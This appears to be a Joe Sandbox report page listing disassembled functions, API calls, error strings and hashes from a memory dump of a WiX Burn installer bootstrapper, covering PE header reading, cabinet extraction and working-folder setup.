Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$File$Pointer$Read
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to user process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$\C|H$burn$section.cpp
API String ID: 2600052162-1960613013
Opcode ID: d86a077e1b7c498e0e6b96f6d48fff28ecae7fb26d074867a409694e0c64ef12
Instruction ID: 24cdfdd1fd7c52b9f08455594e946a1b23abc4b74cbe1174094704f682f024d0
Opcode Fuzzy Hash: d86a077e1b7c498e0e6b96f6d48fff28ecae7fb26d074867a409694e0c64ef12
Instruction Fuzzy Hash: 3812A471A40325EBEB609B29CC86FAB77A8EF04710F01816DFD19E7681D7789D41CBA1

Function 007E0A77 Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 288
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,00000000,00000000,?,007E0621,?,?), ref: 007E0A85
GetLastError.KERNEL32(?,?,?,00000000,00000000,?,007E0621,?,?), ref: 007E0A92
WaitForSingleObject.KERNEL32(?,?,?,?,?,00000000,00000000,?,007E0621,?,?), ref: 007E0ACE
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,007E0621,?,?), ref: 007E0AD8

Strings

Failed to create file: %ls, xrefs: 007E0D38
Failed to reset begin operation event., xrefs: 007E0B4B
cabextract.cpp, xrefs: 007E0AB6, 007E0AFC, 007E0B41, 007E0B6D, 007E0CBE, 007E0D2B, 007E0D7D, 007E0DC2, 007E0E16
Failed to copy stream name: %ls, xrefs: 007E0BB7
Failed to set operation complete event., xrefs: 007E0AC0
Failed to set file pointer to end of file., xrefs: 007E0D87
Failed to set end of file., xrefs: 007E0DCC
Failed to set file pointer to beginning of file., xrefs: 007E0E20
Failed to wait for begin operation event., xrefs: 007E0B06
Invalid operation for this state., xrefs: 007E0B79
Failed to allocate buffer for stream., xrefs: 007E0CC8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$EventObjectSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3600396749-2104912459
Opcode ID: 63123258df6b9bcbf828706898af23b250cdacee88b5b94f3d3c73f5c5d505b9
Instruction ID: 8101d39bdcf072d32d34c2f66d754c7883bf81e26ce8e4ae6272371dc63c3c99
Opcode Fuzzy Hash: 63123258df6b9bcbf828706898af23b250cdacee88b5b94f3d3c73f5c5d505b9
Instruction Fuzzy Hash: CD912972B41721BBE7216B7A8D49BA736D8FF08750F014229FD15EA5E0E7A8CC8086D1

Function 007C4C33 Relevance: 38.7, APIs: 6, Strings: 16, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007C33D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,007C10DD,?,00000000), ref: 007C33F8

CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4E3A
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4E49
CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4E58
CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 007C4E63

Strings

Failed to launch clean room process: %ls, xrefs: 007C4DF1
-%ls="%ls", xrefs: 007C4CE0
Failed to allocate full command-line., xrefs: 007C4D88
%ls %ls, xrefs: 007C4D4F
"%ls" %ls, xrefs: 007C4D74
Failed to append %ls, xrefs: 007C4D16
burn.filehandle.attached, xrefs: 007C4D11
D, xrefs: 007C4DA3
Failed to allocate parameters for unelevated process., xrefs: 007C4CF4
user.cpp, xrefs: 007C4DE4
Failed to cache to clean room., xrefs: 007C4CBC
burn.clean.room, xrefs: 007C4CD8
Failed to append original command line., xrefs: 007C4D63
burn.filehandle.self, xrefs: 007C4D3F
Failed to wait for clean room process: %ls, xrefs: 007C4E1D
Failed to get path for current process., xrefs: 007C4C7D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseHandle$FileModuleName
String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$user.cpp
API String ID: 3884789274-2391192076
Opcode ID: 57794330ae9ff7a7895304980fc8b25180aca37f83e1caf4e7dc5e89e638d010
Instruction ID: d78c98783a00ff472055e8f79cf7cd24010f2008ace8efa000c367324a33e81e
Opcode Fuzzy Hash: 57794330ae9ff7a7895304980fc8b25180aca37f83e1caf4e7dc5e89e638d010
Instruction Fuzzy Hash: D9717331D01229ABDF21AAA4CC55EEFBB78FF04720F11412DFA14B6291D7789A419BA1

Function 007D7337 Relevance: 35.3, APIs: 1, Strings: 19, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to open attached UX container., xrefs: 007D739B
Failed to set original source variable., xrefs: 007D7558
Failed to open manifest stream., xrefs: 007D73B8
Failed to set source process folder variable., xrefs: 007D7533
Failed to initialize internal cache functionality., xrefs: 007D758D
WixBundleElevated, xrefs: 007D74B3, 007D74C4
WixBundleSourceProcessFolder, xrefs: 007D7522
Failed to get unique temporary folder for bootstrapper application., xrefs: 007D75BC
Failed to extract bootstrapper application payloads., xrefs: 007D75DD
Failed to overwrite the %ls built-in variable., xrefs: 007D74C9
WixBundleOriginalSource, xrefs: 007D7547
Failed to parse command line., xrefs: 007D7474
Failed to load catalog files., xrefs: 007D75FD
Failed to load manifest., xrefs: 007D73F5
Failed to set source process path variable., xrefs: 007D74F7
Failed to get source process folder from path., xrefs: 007D7513
Failed to initialize variables., xrefs: 007D737E
Failed to get manifest stream from container., xrefs: 007D73D9
WixBundleSourceProcessPath, xrefs: 007D74E6

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath
API String ID: 32694325-252221001
Opcode ID: 2b488efb8a5e41d7a95e9de5276899f1a5ca199e66d5373df085869c7944bd47
Instruction ID: 5c031f862411ec9519ffeac836b6a98540d8e5c0a34cb85bd711d56ec823c123
Opcode Fuzzy Hash: 2b488efb8a5e41d7a95e9de5276899f1a5ca199e66d5373df085869c7944bd47
Instruction Fuzzy Hash: D4917272A44A19BBCB169AA4CC45EEEB77CBF04711F00022BF515F6240F738EA54DBA1

Function 007D84C4 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 205
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,007C4CB6,?,?,00000000,007C4CB6,00000000), ref: 007D8507
GetLastError.KERNEL32 ref: 007D8514
CloseHandle.KERNELBASE(00000000,?,00000000,0080B4F0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D86F6

Strings

Failed to seek to signature table in exe header., xrefs: 007D8660
msi.dll, xrefs: 007D8608
Failed to seek to original data in exe burn section header., xrefs: 007D86CF
Failed to update signature offset., xrefs: 007D8615
Failed to create user file at path: %ls, xrefs: 007D8545
cabinet.dll, xrefs: 007D866F
Failed to seek to checksum in exe header., xrefs: 007D85F9
Failed to zero out original data offset., xrefs: 007D86E8
Failed to copy user from: %ls to: %ls, xrefs: 007D859C
Failed to seek to beginning of user file: %ls, xrefs: 007D856D
cache.cpp, xrefs: 007D8538, 007D85EF, 007D8656, 007D86C5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to copy user from: %ls to: %ls$Failed to create user file at path: %ls$Failed to seek to beginning of user file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
API String ID: 2528220319-1976062716
Opcode ID: 01584f015874970df46acc7e71cf7591b51fefdc657a0aea8036d7ab64ca8b32
Instruction ID: 09a887ff270275efa98e6e93d944296541b81a9e503e789c3ce754e53643f388
Opcode Fuzzy Hash: 01584f015874970df46acc7e71cf7591b51fefdc657a0aea8036d7ab64ca8b32
Instruction Fuzzy Hash: A951C872A40625BBE7515B698C49FBB36BCFF04720F01412AFE15E7381EB68CC1196E6

Function 007D80AE Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,007C5381), ref: 007D8104

Part of subcall function 0080076C: OpenProcessToken.ADVAPI32(?,00000008,?,007C52B5,00000000,?,?,?,?,?,?,?,007D74AB,00000000), ref: 0080078A
Part of subcall function 0080076C: GetLastError.KERNEL32(?,?,?,?,?,?,?,007D74AB,00000000), ref: 00800794
Part of subcall function 0080076C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,007D74AB,00000000), ref: 0080081D

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 007D812A
GetLastError.KERNEL32 ref: 007D8134
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 007D81B1
GetLastError.KERNEL32 ref: 007D81BB

Strings

Failed to get windows path for working folder., xrefs: 007D8162
Temp\, xrefs: 007D8189
Failed to concat Temp directory on windows path for working folder., xrefs: 007D81A1
Failed to append bundle id on to temp path for working folder., xrefs: 007D8264
Failed to convert working folder guid into string., xrefs: 007D823A
Failed to get temp path for working folder., xrefs: 007D81E9
%ls%ls\, xrefs: 007D824C
Failed to copy working folder path., xrefs: 007D827F
Failed to ensure windows path for working folder ended in backslash., xrefs: 007D817F
cache.cpp, xrefs: 007D8158, 007D81DF, 007D8230
Failed to create working folder guid., xrefs: 007D8207
4#v, xrefs: 007D81B1

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$Process$CloseCurrentDirectoryHandleOpenPathTempTokenWindows
String ID: 4#v$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 348923985-3587817078
Opcode ID: d6b725384d9edf477b1a981c3156c324022664f23cf0f37e70fcec688bc62d27
Instruction ID: c5d559806975f11d860250e23f86fec68b453760ce40833f83eef2a933a9900e
Opcode Fuzzy Hash: d6b725384d9edf477b1a981c3156c324022664f23cf0f37e70fcec688bc62d27
Instruction Fuzzy Hash: 0041E772B40724ABDBA096A49C4AFA773BCFF04710F01415AF945F7340EA7D9D4486D2

Function 007C7503 Relevance: 33.4, APIs: 1, Strings: 21, Instructions: 378
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(007D7378,007C52B5,00000000,007C533D), ref: 007C7523

Strings

0, xrefs: 007C753D
WixBundleForcedRestartPackage, xrefs: 007C7CF0
WixBundleProviderKey, xrefs: 007C7D5A
WixBundleElevated, xrefs: 007C7D2E
WixBundleSourceProcessFolder, xrefs: 007C7D86
LogonUser, xrefs: 007C77B2
InstallerName, xrefs: 007C76F8
WixBundleInstalled, xrefs: 007C7D12
Failed to add built-in variable: %ls., xrefs: 007C7DF0
WixBundleExecutePackageCacheFolder, xrefs: 007C7CAC
WixBundleActiveParent, xrefs: 007C7D47
WixBundleTag, xrefs: 007C7D99
#, xrefs: 007C759C
', xrefs: 007C77E2
Date, xrefs: 007C7642
WixBundleVersion, xrefs: 007C7DAC
InstallerVersion, xrefs: 007C771E
$, xrefs: 007C7C54
WixBundleAction, xrefs: 007C7C90
WixBundleSourceProcessPath, xrefs: 007C7D6D
WixBundleExecutePackageAction, xrefs: 007C7CCE

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleVersion
API String ID: 32694325-826827252
Opcode ID: a8adb384698a052504585ff3e1040e0c9bdb27b08597ada797da9a9849c8ce34
Instruction ID: c5ee270707b7cbbd426d195b1643a27109d23033e79b98f22441cc603652fd1f
Opcode Fuzzy Hash: a8adb384698a052504585ff3e1040e0c9bdb27b08597ada797da9a9849c8ce34
Instruction Fuzzy Hash: AB322EB0D152798BDB65CF598D8878DBBB8FB49704F5082DEE10CA6251D7B50B88CF84

Function 007E0E43 Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 007E0E65
CoUninitialize.COMBASE ref: 007E10D9

Strings

Failed to reset begin operation event., xrefs: 007E1091
<the>.cab, xrefs: 007E0F05
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 007E0FC0
cabextract.cpp, xrefs: 007E0EDB, 007E0FFF, 007E104A, 007E1087, 007E10B3
Failed to initialize cabinet.dll., xrefs: 007E0EE7
Failed to set operation complete event., xrefs: 007E1009
Failed to wait for begin operation event., xrefs: 007E1054
Invalid operation for this state., xrefs: 007E10BD
Failed to initialize COM., xrefs: 007E0E71

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: fe20bd52f8f7f4d50fb1fa06230815d4f994bb883677180cc6994b6e810c7e21
Instruction ID: ad9e37062e5868f5d021999b45a67ff5925264f6a6e6bc36098b2e9f59fc59f1
Opcode Fuzzy Hash: fe20bd52f8f7f4d50fb1fa06230815d4f994bb883677180cc6994b6e810c7e21
Instruction Fuzzy Hash: 40514F72A427E1E7D73016668C46E6B7664EF48720F124229FC12FB3C0D6AD8DD199D2

Function 007C41D2 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,007C515E,?,?,00000000,?,?), ref: 007C41FE
InitializeCriticalSection.KERNEL32(000000D0,?,?,007C515E,?,?,00000000,?,?), ref: 007C4207
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,007C515E,?,?,00000000,?,?), ref: 007C424D
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,007C515E,?,?,00000000,?,?), ref: 007C4257
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,007C515E,?,?,00000000,?,?), ref: 007C426B
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,007C515E,?,?,00000000,?,?), ref: 007C427B
lstrlenW.KERNEL32(burn.filehandle.self,?,?,007C515E,?,?,00000000,?,?), ref: 007C42CB
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,007C515E,?,?,00000000,?,?), ref: 007C42D5
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,007C515E,?,?,00000000,?,?), ref: 007C42E9
lstrlenW.KERNEL32(burn.filehandle.self,?,?,007C515E,?,?,00000000,?,?), ref: 007C42F9

Strings

user.cpp, xrefs: 007C4390, 007C43BC
Missing required parameter for switch: %ls, xrefs: 007C439F
burn.filehandle.attached, xrefs: 007C4248, 007C4250, 007C4255, 007C4256, 007C4276, 007C439A
burn.filehandle.self, xrefs: 007C42C6, 007C42CE, 007C42D3, 007C42D4, 007C42F4, 007C43C6
Failed to initialize user section., xrefs: 007C4362
Failed to parse file handle: '%ls', xrefs: 007C437D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize user section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$user.cpp
API String ID: 3039292287-3209860532
Opcode ID: a156303c23839067ac7889be270704d323cdd491b79e02104453b79e737dbca6
Instruction ID: 1ee3bfe1c0eb143235dd5c4c2c950a57c25a075154546aeb01f2cd31e037c33a
Opcode Fuzzy Hash: a156303c23839067ac7889be270704d323cdd491b79e02104453b79e737dbca6
Instruction Fuzzy Hash: 1651F671A00255BFC7209B69CC96FAA776CFF44760F00412EF628E73A0D778A950CBA4

Function 007CC129 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 128
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,007CC319,007C52FD,?,?,007C533D), ref: 007CC170
GetLastError.KERNEL32(?,007CC319,007C52FD,?,?,007C533D,007C533D,00000000,?,00000000), ref: 007CC181
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,007CC319,007C52FD,?,?,007C533D,007C533D,00000000,?), ref: 007CC1D0
GetCurrentProcess.KERNEL32(000000FF,00000000,?,007CC319,007C52FD,?,?,007C533D,007C533D,00000000,?,00000000), ref: 007CC1D6
DuplicateHandle.KERNELBASE(00000000,?,007CC319,007C52FD,?,?,007C533D,007C533D,00000000,?,00000000), ref: 007CC1D9
GetLastError.KERNEL32(?,007CC319,007C52FD,?,?,007C533D,007C533D,00000000,?,00000000), ref: 007CC1E3
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,007CC319,007C52FD,?,?,007C533D,007C533D,00000000,?,00000000), ref: 007CC235
GetLastError.KERNEL32(?,007CC319,007C52FD,?,?,007C533D,007C533D,00000000,?,00000000), ref: 007CC23F

Strings

feclient.dll, xrefs: 007CC232
crypt32.dll, xrefs: 007CC231
Failed to open container., xrefs: 007CC28B
Failed to move file pointer to container offset., xrefs: 007CC26D
Failed to duplicate handle to container: %ls, xrefs: 007CC214
container.cpp, xrefs: 007CC1A5, 007CC207, 007CC263
Failed to open file: %ls, xrefs: 007CC1B2

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
API String ID: 2619879409-373955632
Opcode ID: c2e4ecedbadd0a03bc9432c5a1c5a9d1c4c62e69412b6a5b610d0ab95fceeeff
Instruction ID: 8ff69fe2ee6343899d696b6b2e1287a5e03c419383db1a7af165f0d51f6770a8
Opcode Fuzzy Hash: c2e4ecedbadd0a03bc9432c5a1c5a9d1c4c62e69412b6a5b610d0ab95fceeeff
Instruction Fuzzy Hash: 1C41A172240301ABEB619F6ADC89F573BE9FB85760F11812DFD18DB292DA35C811CB60

Function 008029B3 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 86
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007C37EA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C3829
Part of subcall function 007C37EA: GetLastError.KERNEL32 ref: 007C3833

Part of subcall function 00804932: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0080495A

GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 008029FD
GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00802A20
GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00802A43
GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00802A66
GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00802A89
GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00802AAC
GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00802ACF

Strings

MsiSetExternalUIRecord, xrefs: 00802A93
Msi.dll, xrefs: 008029C5
MsiEnumProductsExW, xrefs: 00802A2A
MsiGetProductInfoExW, xrefs: 00802A70
MsiGetPatchInfoExW, xrefs: 00802A4D
MsiDetermineApplicablePatchesW, xrefs: 00802A07
MsiDeterminePatchSequenceW, xrefs: 008029F2
MsiSourceListAddSourceExW, xrefs: 00802AB6

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressProc$ErrorLast$DirectorySystem
String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
API String ID: 2510051996-1735120554
Opcode ID: 03b1df89f37e0355550c72121e8005106e6759f5705c6bdddd746cf4867b2f72
Instruction ID: f4adbf1981ddeb3deb5fac1ae591707836882fa4178003b84e40a430cbc5e5ce
Opcode Fuzzy Hash: 03b1df89f37e0355550c72121e8005106e6759f5705c6bdddd746cf4867b2f72
Instruction Fuzzy Hash: 47313EB0643218EFDB68DF25EC56A2A3BB5F764700740852EE405D23A0F7B5A956DF04

Function 007E1484 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 103COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,007CC285,?,00000000,?,007CC319), ref: 007E14BB
GetLastError.KERNEL32(?,007CC285,?,00000000,?,007CC319,007C52FD,?,?,007C533D,007C533D,00000000,?,00000000), ref: 007E14C4

Strings

cabextract.cpp, xrefs: 007E14E8, 007E152E, 007E157A
Failed to wait for operation complete., xrefs: 007E1597
Failed to create extraction thread., xrefs: 007E1584
Failed to create begin operation event., xrefs: 007E14F2
